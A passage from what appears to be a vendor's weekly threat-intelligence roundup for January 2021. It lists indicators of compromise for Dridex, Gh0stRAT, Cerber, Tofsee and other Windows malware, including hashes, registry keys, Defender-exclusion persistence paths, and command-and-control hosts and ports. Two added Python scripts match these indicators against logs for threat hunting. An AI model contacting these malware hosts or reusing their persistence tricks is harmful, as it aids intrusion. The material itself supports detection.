Friday, January 29, 2021

Threat Roundup for January 22 to January 29


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 22 and Jan. 29. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and by discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post lists at most 25 of the associated file hashes and at most 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of a technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. Five distinct shades are used, with the darkest indicating that no files exhibited the technique and the brightest indicating that the technique was observed in 75 percent or more of the files.
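The two caveats above (indicators are defanged with "[.]", and a single IOC hit does not prove an infection) are easier to act on with a little tooling. The following Python script is an added example written for this page; it is not Talos tooling and not part of the original post. It parses an excerpt in the roundup's own "indicator occurrences" layout, refangs the "[.]" notation, keeps CIDR ranges such as 91[.]119[.]56[.]0/27 from the Cerber section as networks, and then scores constructed log lines per host, marking multicast, private and loopback destinations as weak signals and reporting only hosts with two or more distinct strong hits. The excerpt, the key=value log format and the host names are assumptions made for the example.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed excerpt in the roundup's "indicator occurrences" layout (assumed
# sample text for this example; it is not the post's full IOC list).
ROUNDUP_EXCERPT = """\
Mutexes Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 132
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
178[.]128[.]255[.]179 132
91[.]119[.]56[.]0/27 132
239[.]255[.]255[.]250 106
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]blockcypher[.]com 132
gyw[.]f3322[.]net 3
*See JSON for more IOCs
File Hashes
032c8169d8009fc30479b5ec5438a88fd5daeb576ced3c1d95786c4257ed9145 1cb9155a8f2b0116c74ad7207c24d8d62cc16a499202099b67b5dba66a939359
"""

# Only the network tables are parsed here; mutex, registry and file tables are skipped.
SECTIONS = {"IP Addresses": "ip", "Domain Names": "domain"}
IOC_LINE = re.compile(r"^(?P<ind>\S+) (?P<count>\d+)$")
SHA256 = re.compile(r"\b[0-9a-f]{64}\b")


def refang(indicator):
    """Undo the roundup's defanging so values can be compared with logs."""
    return indicator.replace("[.]", ".")


def parse_roundup(text):
    """Return ({ip_network: occurrences}, {domain: occurrences}, {sha256, ...})."""
    nets, domains, section = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("Occurrences") or line.startswith("File Hashes"):
            section = next((n for h, n in SECTIONS.items() if line.startswith(h)), None)
            continue
        m = IOC_LINE.match(line)
        if not m or section is None:
            continue
        ind, count = refang(m["ind"]), int(m["count"])
        if section == "ip":
            # Single addresses become /32 networks; ranges such as 91.119.56.0/27 stay as written.
            nets[ipaddress.ip_network(ind, strict=False)] = count
        else:
            domains[ind.lower()] = count
    return nets, domains, set(SHA256.findall(text))


# Constructed DNS and connection log lines for two hosts (assumed key=value format).
LOG_LINES = [
    "2021-01-25T10:02:11Z host=ws17 dns query=api.blockcypher.com",
    "2021-01-25T10:02:12Z host=ws17 conn dst=91.119.56.17 dport=6892 proto=udp",
    "2021-01-25T10:02:13Z host=ws17 conn dst=239.255.255.250 dport=1900 proto=udp",
    "2021-01-25T10:05:00Z host=ws03 conn dst=239.255.255.250 dport=1900 proto=udp",
    "2021-01-25T10:05:01Z host=ws03 dns query=www.example.com",
]
FIELD = re.compile(r"\b(host|query|dst)=([\w.:-]+)")


def match_logs(lines, nets, domains):
    """Map host -> [(indicator, roundup occurrences, weak_signal), ...]."""
    hits = defaultdict(list)
    for line in lines:
        fields = dict(FIELD.findall(line))
        host = fields.get("host", "?")
        q = fields.get("query", "").lower()
        if q in domains:
            hits[host].append((q, domains[q], False))
        if "dst" in fields:
            addr = ipaddress.ip_address(fields["dst"])
            # Multicast, private and loopback destinations (e.g. SSDP 239.255.255.250 in
            # the Tofsee list) are shared with benign software: keep the hit, mark it weak.
            weak = addr.is_multicast or addr.is_private or addr.is_loopback
            for net, count in nets.items():
                if addr in net:
                    hits[host].append((str(addr), count, weak))
    return dict(hits)


def corroborated(hits, min_strong=2):
    """Hosts with at least min_strong distinct non-weak indicators: a triage cue, not a verdict."""
    return sorted(h for h, entries in hits.items()
                  if len({i for i, _, weak in entries if not weak}) >= min_strong)


if __name__ == "__main__":
    nets, domains, hashes = parse_roundup(ROUNDUP_EXCERPT)
    hits = match_logs(LOG_LINES, nets, domains)
    for host, entries in sorted(hits.items()):
        for ind, count, weak in entries:
            print(f"{host}: {ind} seen in {count} samples{' [weak]' if weak else ''}")
    print("corroborated:", corroborated(hits), "| hashes loaded:", len(hashes))
```

The occurrence count carried through from the table is a prevalence figure across the analyzed samples, not a confidence score; the corroboration threshold is what keeps a lone SSDP multicast hit from paging anyone.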

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Packed.Dridex-9823030-1 Packed Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.Gh0stRAT-9823621-1 Trojan Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Ransomware.Cerber-9826826-1 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber." In more recent campaigns, other file extensions are used.
Win.Trojan.Hupigon-9823466-0 Trojan Hupigon is a trojan that installs itself as a backdoor on a victim's machine.
Win.Packed.Tofsee-9824692-1 Packed Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Dropper.DarkComet-9823729-1 Dropper DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. The malware can download files from a user's machine, includes mechanisms for persistence and hiding, and can send back usernames and passwords from the infected system.
Win.Virus.Expiro-9826837-0 Virus Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Packed.Chthonic-9826669-1 Packed Chthonic is a banking trojan derived from the Zeus family of banking malware. It is typically spread via phishing emails and attempts to steal sensitive information from an infected machine. Chthonic has also been observed downloading follow-on malware such as Azorult, another information stealer.

Threat Breakdown

Win.Packed.Dridex-9823030-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 14 samples
Files and or directories created Occurrences
<malware cwd>\old_<malware exe name> (copy) 14

File Hashes

3755691f9bff778d637b19b94a67492af2442f95cab2591b988210330875b0df 4348e58057aee19e92f8ff04e1c34518d27870def8023f9b307741d3b0b21b53 49d77a61ac463c8cc04b86fc519d7a8053d3a2327491ded37eede6439309299e 4cc918dace37f097834e5f64701d3b1e3734cb969b40dde671819f1793fcea30 79a341dfe5c6a25846666c8e47422118eb3b005abfe5ba29f56d2ddddfbc6ca1 7a60d512a90316abe8b5d0edc11118e6e6fb091f86a4a21ee14ce6b977bda250 8ec4aa6cbb01256b9deef81bcf3eb5f86317bf422d5996e37e84dbbb22631682 8ed7be33532c3cd759649af68db4f28646630d0646a2e254f1b27ec16565d655 ad14c8b993a4e03ebecf7358c091914a6c3441fb3870973eedbb38202841596c c3c0b001e5e52f04f0c97aa90fdee8c2c00ab704f685c07c8e47118637eb245c e116f1afd7344ffd8ae03a10a2fa94dd1b17e05201237508af4899783e18e1c5 e34085a13c1a9178a5160993834aa9052440948955a7cc6cc795331f96fc7dbd e58224d96312291f651e2213437699c7506fbaf9d96ba6054daa9703e9c8dc07 fad4999eac6048223f2cad76805e38b2048db2677531d1f68c25ecdb7ee41dcb

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Trojan.Gh0stRAT-9823621-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 13 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: Type
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: Start
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: ErrorControl
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: WOW64
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: ObjectName
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: FailureActions
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: Description
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: DisplayName
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS 4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF HIJKLMNO QRS
Value Name: ImagePath
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: Description
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: DisplayName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: WOW64
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: ObjectName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: FailureActions
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: Type
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: ErrorControl
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GHIJKL NOPQRSTU WXY
Value Name: ImagePath
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VWXYAB DEFGHIJK MNO
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VWXYAB DEFGHIJK MNO
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VWXYAB DEFGHIJK MNO
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VWXYAB DEFGHIJK MNO
Value Name: FailureActions
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU WXYABCDE GHI
Value Name: Description
1
Mutexes Occurrences
<original file dir>\<original file name>.exe 13
gyw.f3322.net:8016 3
C:\Windows\kqumii.exe 3
cq3426.3322.org:1150 3
C:\Windows\gmgueg.exe 3
www.q-show.org:1150 2
C:\Windows\ciscae.exe 2
C:\Windows\vondgu.exe 2
C:\Windows\rkzlcs.exe 1
www.xuwupiaomiao.com:801 1
115.28.153.10:1150 1
127.0.0.1:1150 1
pzss.f3322.org:1165 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
59[.]46[.]80[.]202 3
103[.]252[.]19[.]106 3
185[.]199[.]109[.]153 1
185[.]199[.]111[.]153 1
115[.]28[.]153[.]10 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
gyw[.]f3322[.]net 3
cq3426[.]3322[.]org 3
www[.]q-show[.]org 2
www[.]xuwupiaomiao[.]com 1
pzss[.]f3322[.]org 1
zqyxuwupiaomiao[.]github[.]io 1
Files and or directories created Occurrences
%SystemRoot%\kqumii.exe 3
%SystemRoot%\gmgueg.exe 3
%SystemRoot%\boxlou.exe 2
%SystemRoot%\wwmiwy.exe 2
%SystemRoot%\ciscae.exe 2
%SystemRoot%\vondgu.exe 2
%SystemRoot%\mmqcmg.exe 1
%SystemRoot%\hufzuk.exe 1
%SystemRoot%\kkwgks.exe 1
%SystemRoot%\lchlci.exe 1
%SystemRoot%\rkzlcs.exe 1
%SystemRoot%\ookyou.exe 1
%SystemRoot%\vipxie.exe 1

File Hashes

1cb9155a8f2b0116c74ad7207c24d8d62cc16a499202099b67b5dba66a939359 1fab2aff0dbcac874252922eafa755f599e161066f2750ffbbfdebf422398abc 353a9f9a607ba9911212d189dad291ed746f41539c55cdcf21ea2cc074bba64b 362341c99234be0662dc57f292eb4ddf1bb2af0c883834ef4ebbdea536bb4462 48b97e4ee26211111b9f8430d0f20851bad219d476638ec4238c8a73903ba6ab 57f03d3dcecb74f91be7da44b22f7283ab8d89bcbe84b743c1a07bbe75b75b81 5fc6610e630742ea6342d103b9e79c5f2b38fe35e55479d373866a8788085de5 80f14ef95b63e9ffa1ba4597f46aca85aa4ec3de4776f0beb4f8652d1b35071d b98016fd39b41a7ff58c7ea2ff0c2b251fe04ebd4c7f4cb5c9239888df273455 b9f1d3de3a5714eb04c0b68cccedb86126e0579739f319e02a7cdd158950fe6c bc2b78512339c5e8169a2ba5c22e348c470304236a176a373547b5d9fb02aa8f edccd09778d2a0f6bcfec9679f0c8f60ba34039fd92776e3eb198c40db58271a f3c5f3d2363eaa9200ef6de96a3825192bb8b1a7d57633e2cca9de852b19dfd9

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Ransomware.Cerber-9826826-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 132 samples
Mutexes Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 132
shell.{<random GUID>} 24
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
178[.]128[.]255[.]179 132
91[.]119[.]56[.]0/27 132
91[.]120[.]56[.]0/27 132
91[.]121[.]56[.]0/22 132
104[.]21[.]50[.]61 76
104[.]20[.]21[.]251 28
172[.]67[.]157[.]138 16
172[.]67[.]2[.]88 16
104[.]20[.]20[.]251 15
54[.]87[.]5[.]88 4
193[.]242[.]211[.]182 2
52[.]21[.]132[.]24 2
104[.]16[.]150[.]172 2
104[.]16[.]148[.]172 2
172[.]67[.]69[.]167 2
104[.]16[.]152[.]172 1
198[.]55[.]100[.]116 1
23[.]152[.]0[.]36 1
104[.]26[.]14[.]247 1
104[.]26[.]15[.]247 1
173[.]194[.]175[.]102 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]blockcypher[.]com 132
bitaps[.]com 132
btc[.]blockr[.]io 132
chain[.]so 132
sochain[.]com 2
p27dokhpz2n7nvgr[.]1ktjse[.]top 2
p27dokhpz2n7nvgr[.]1lseoi[.]top 1
p27dokhpz2n7nvgr[.]1h23cc[.]top 1
p27dokhpz2n7nvgr[.]1cglxz[.]top 1
Files and or directories created Occurrences
%TEMP%\d19ab989 132
%TEMP%\d19ab989\4710.tmp 132
%TEMP%\d19ab989\a35f.tmp 132
%TEMP%\~PI<random, matching [A-F0-9]{2,4}>.tmp 25
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 25
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp 25
<dir>\_HELP_HELP_HELP_<random, matching '[A-F0-9]{4,8}'>_.hta 25
<dir>\_HELP_HELP_HELP_<random, matching '[A-F0-9]{4,8}'>_.png 25
<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy) 24
%TEMP%\24e2b309\1719.tmp 20
%TEMP%\24e2b309\4436.tmp 20
%TEMP%\<random, matching [a-z0-9]{8}\[a-f0-9]{4}>.tmp 4

File Hashes

032c8169d8009fc30479b5ec5438a88fd5daeb576ced3c1d95786c4257ed9145 03fc7d18984c43544b429208a124c1ab3bf71c6876f1f2a1c3b54703f9a53a71 046da337f4ac96c679c3da97556c57427086cb4e81ac4218c2edc7956e775d22 0804f23ccd203cc2de3277a9f6a58e578b716a78f7d93588b9538213a9a6f72f 09590181a0f19560f80f28e3c541df7356e5fc7bc373d8d1a33e9a602c7d76dd 0a37d20ad25e354cd3e1f616275021744a7c776dacb45091df94e6883f206dc8 0ad8711b6997b9ccd46d330fa3056745b7981e3fc94ce343732ea47e87576905 0afaf4a5b6fa740a435d93d07f21e3616535725941defc2fc8e447c478aad736 0e8ff26596d14aa9947d5fb5399942ea8b17cbadaad54f510495a513715a0ca6 0f1c51d55dc4bde3cf0c62147fbe6409bdc4d341d52247d00f586a6482af1511 0fc6b54304648fc6f5898fa8ab503f685b105357e52db6af021253a56bb8f247 0fd42b326666f13440fa0008f810f0a125e1d25e3225464ebf9262bedb0d835c 10bf9202a6db75f84b931357ac21779597eadbc7bb620f7ff915be705f490309 12bd04c85e976145c51d531bbf4932c38dff9064be2aec2ecb4af3c04d1d4768 14782954d5ba87fc0fd79706df2f3227dea9344226286332a2f4211bd18901af 17aac7c01de3788aad85bc623cf78da5260335083d4d3b77f3682d27462cffea 1947c3ab281844c155f6edbbee45587f70ff02602137a860e53a597c6751df5a 1c3951053d16ee881dfa8d36a9a64473a13f089cfba5c59ebfba9cbac65b47f2 1d665c0a28a799ed88b4fbe1b6b66a89836030c4f9f6b287489fa6c92a350452 2452a341ed8bca9dd380e6b97b0270b75c042b49fa4b7c769e2effa1cf778b57 26c069149f3410c89729662a8a32196ab35619187b98715923ec8d0369ba8aa5 29992dfdd2bf0a5a480e71748bbb392c13658062b7d838633299b5677f374824 2c2c8c256a1c1f2bff07cdec1de5731cc2c211d19d646e896845e96e5fcd7c04 2ede459b0e8a5fe2c03bbfbbf301b9a87f9433da264263dc392cb8286e178e0e 351f96f2d1983cf7a7d9d0d12d9222ec0a2669a020af25d4c9405d24c18d7292
*See JSON for more IOCs
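The file-path IOCs in these tables use placeholders rather than literal paths: environment variables such as %TEMP% and %SystemRoot%, "<dir>" for an arbitrary directory, "<random GUID>", "<random, matching '...'>" with a regex for the random portion, and a trailing "(copy)" annotation. As an added example (not code from the original post or from Talos), the following Python turns such entries into anchored regular expressions and matches them against constructed file-creation paths taken from the Cerber, Tofsee and DarkComet tables. The environment-variable expansions, the sample paths, and the treatment of a bare backslash inside a placeholder regex as a path separator are assumptions made for the example.

```python
import re

# Typical expansions for the environment placeholders used in the roundup's file
# tables (assumed defaults for a 64-bit Windows install with per-user profiles).
ENV = {
    "%TEMP%": r"C:\\Users\\[^\\]+\\AppData\\Local\\Temp",
    "%APPDATA%": r"C:\\Users\\[^\\]+\\AppData\\Roaming",
    "%HOMEPATH%": r"C:\\Users\\[^\\]+",
    "%SystemRoot%": r"C:\\Windows",
    "%System32%": r"C:\\Windows\\System32",
}
TOKEN = re.compile(r"(%[^%]+%|<[^>]*>)")
RANDOM = re.compile(r"^<random, matching\s+'?(.+?)'?>$")
GUID = r"[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}"


def _placeholder(tok):
    """Translate one <...> or %...% placeholder into a regex fragment."""
    if tok in ENV:
        return ENV[tok]
    if tok.startswith("%"):
        return r".+?"                     # unknown environment variable
    m = RANDOM.match(tok)
    if m:
        # Assumption: in the page's placeholder regexes a bare backslash before '['
        # (e.g. '[a-z]{8}\[a-z]{6,8}') is a path separator, so it is escaped here.
        return re.sub(r"\\(?=\[)", r"\\\\", m[1])
    if tok == "<dir>":
        return r".+"
    if tok == "<random GUID>":
        return GUID
    return r"[^\\]+"                      # <malware exe name>, <original file dir>, ...


def compile_ioc(pattern):
    """Compile a roundup file-path IOC (with placeholders) into an anchored regex."""
    pattern = re.sub(r"\s*\(copy\)$", "", pattern)   # '(copy)' is an annotation, not path text
    parts = [(_placeholder(p) if TOKEN.fullmatch(p) else re.escape(p))
             for p in TOKEN.split(pattern) if p]
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


# File-path IOCs copied from the Cerber, Tofsee and DarkComet tables in this roundup.
IOC_PATHS = [
    r"%TEMP%\d19ab989\4710.tmp",
    r"<dir>\_HELP_HELP_HELP_<random, matching '[A-F0-9]{4,8}'>_.hta",
    r"<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy)",
    r"%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>",
    r"%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)",
    r"%APPDATA%\dclogs",
]

# Constructed file-creation events (assumed full paths from an EDR or Sysmon feed).
EVENTS = [
    r"C:\Users\alice\AppData\Local\Temp\d19ab989\4710.tmp",
    r"C:\Users\alice\Documents\_HELP_HELP_HELP_7F3A9C_.hta",
    r"C:\Users\alice\Documents\Q2XK7-A9P0.3B1F",
    r"C:\Windows\SysWOW64\wpdjiqwl",
    r"C:\Windows\System32\ktkxhdjq\mktudzok.exe",
    r"C:\Users\bob\AppData\Roaming\dclogs",
    r"C:\Windows\System32\drivers\etc\hosts",
]


def match_paths(ioc_patterns, paths):
    """Map each observed path to the list of IOC patterns it satisfies."""
    compiled = [(p, compile_ioc(p)) for p in ioc_patterns]
    return {path: [p for p, rx in compiled if rx.match(path)] for path in paths}


if __name__ == "__main__":
    for path, matched in match_paths(IOC_PATHS, EVENTS).items():
        print(f"{path}\n  -> {matched or 'no match'}")
```

The "<dir>" placeholder is the loose part: the Cerber ransom-note and renamed-file patterns can land anywhere the encryptor could write, so those two rules are best paired with a volume threshold (many matches in a short window on one host) rather than treated as single-hit alerts.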

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



Malware



MITRE ATT&CK





Win.Trojan.Hupigon-9823466-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Mutexes Occurrences
Local\https://m.stripe.network/ 2
Local\https://www.gettoggle.com/ 2
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
204[.]79[.]197[.]200 19
199[.]59[.]242[.]150 17
107[.]178[.]240[.]89 16
199[.]59[.]242[.]155 15
142[.]250[.]80[.]4 15
172[.]217[.]3[.]106 14
172[.]217[.]7[.]3 13
72[.]22[.]185[.]207 10
72[.]21[.]81[.]200 9
65[.]55[.]252[.]93 9
209[.]85[.]232[.]95 7
209[.]85[.]201[.]94 7
72[.]22[.]185[.]199 6
192[.]35[.]177[.]64 6
142[.]250[.]64[.]74 6
13[.]107[.]21[.]200 4
131[.]253[.]33[.]200 4
172[.]217[.]197[.]104/31 4
91[.]199[.]212[.]52 3
23[.]3[.]13[.]33 3
23[.]3[.]13[.]40 3
209[.]85[.]144[.]95 3
173[.]194[.]66[.]95 3
13[.]107[.]22[.]200 3
142[.]250[.]80[.]10 3
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
ajax[.]googleapis[.]com 17
fonts[.]gstatic[.]com 17
ads[.]pro-market[.]net 16
pbid[.]pro-market[.]net 16
tracking[.]bodis[.]com 15
spanish[.]ircfast[.]com 13
cs9[.]wpc[.]v0cdn[.]net 9
sqm[.]telemetry[.]microsoft[.]com[.]nsatc[.]net 9
english[.]ircfast[.]com 3
ctldl[.]windowsupdate[.]com 2
cdnjs[.]cloudflare[.]com 2
apps[.]digsigtrust[.]com 2
apps[.]identrust[.]com 2
cm[.]g[.]doubleclick[.]net 2
match[.]adsrvr[.]org 2
crt[.]usertrust[.]com 2
cdn[.]ravenjs[.]com 2
aa[.]agkn[.]com 2
bcp[.]crwdcntrl[.]net 2
beacon[.]krxd[.]net 2
ce[.]lijit[.]com 2
d[.]turn[.]com 2
dpm[.]demdex[.]net 2
idsync[.]rlcdn[.]com 2
pixel-sync[.]sitescout[.]com 2
*See JSON for more IOCs

File Hashes

0b3b37ad4215c7b24f7a64cf569cd8d7fc28421cc98c28447d2aedf007355c51 125fa1bbf6efd7826c7d793368820f4787036fd5c8d81e7ff651a003503a52c9 2c47d33643e8a1c53684e0e4e3dca6e185b3cee12c276371a2910ba722ccd273 4d3dbfa2067ebf89bb667b5408ab01b2c1e6565b33b8e2440307aab60ace1063 54d2190d82dc8ee4d50921bde9178970907dd80f0e8492185172e4151c5dd464 7cd7490da59c3b78585b0d9378da9967152ee8dda3da2dd5297d9cb0ae9132c9 88c170868b26a70b9b5de9806e9c9b7e7e0c75be0b9b897df3eea1379760a8b4 89271d8fc49283958d56665c4573f7c0cd3dfc6b6dc30c95827792f6f4ef6c83 89efd543179b1cf802d21c9bc23b33b5d554a5987eeb0fb15efdeafb9893eb96 8c19e420ab70ba60dddfbf705c7606267e2afe25c624ee7a1b9b94b7144c80c1 8ece974bb801aa0d3b0c28053bda5fc096f49d653ece3483348b0a51c35d8616 9f822f7814f21967f4ba1b020c204a6b36f7ca75da984b4a20dc6c6b5577941e a7ef5b77fdb0aab1d4a86bf9222e810621f70e9059e8742413fe38075831d8af aee6ac3c086139593b0553b403d797fdc0e9aa81409b00c57be027e83abf6455 b1cccb0593a395311bcb319fbbac039a920b1919b9da091b39d4a3afa2718ef4 b2a33886e81b6386881d49135ec8ad238eea6221673bf70d7f4a4f185ecf7344 ca0ed61b6d989c8d7f22e38b8316471a396b278fcc93e18a693378771281ff2b ee0f1030ab0fbbce521d912297040ba4542c2727787887d75c5fe550da7ef55b fd8b449289e3dad46fc9908c463563bca11030cd5501e1077b50bbb8db926675

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Packed.Tofsee-9824692-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 107 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
107
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 107
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 107
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
106
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
61
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\wpdjiqwl
9
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\vocihpvk
8
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\mftzygmb
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\xqekjrxm
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\tmagfnti
6
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\buionvbq
6
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\qjxdckqf
6
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\athnmuap
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\piwcbjpe
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\yrflksyn
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\cvjpowcr
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
